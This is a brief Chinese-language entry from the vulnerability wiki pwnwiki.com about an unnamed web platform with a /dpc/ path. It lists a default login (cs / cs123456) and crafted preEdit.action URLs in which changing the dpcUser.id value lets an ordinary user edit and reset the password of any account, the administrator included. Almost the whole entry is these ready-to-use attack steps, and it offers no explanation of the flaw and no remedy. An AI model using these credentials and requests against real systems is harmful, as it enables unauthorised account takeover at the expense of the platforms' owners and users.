免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
前提条件
该漏洞需要普通用户身份登录平台,登录平台后可以以普通用户的权限重置所有用户(包括管理员)的密码。
https://<target>/dpc/
默认用户信息
cs cs123456
重置Admin密码
https://<target>/dpc/dpcUser!preEdit.action?dpcUser.id=1
修改dpcUser.id参数的值可以编辑任意用户,其中可以对任意用户进行重置密码,如:
https://<target>/dpc/dpcUser!preEdit.action?dpcUser.id=2
https://<target>/dpc/dpcUser!preEdit.action?dpcUser.id=3
pwnwiki.com
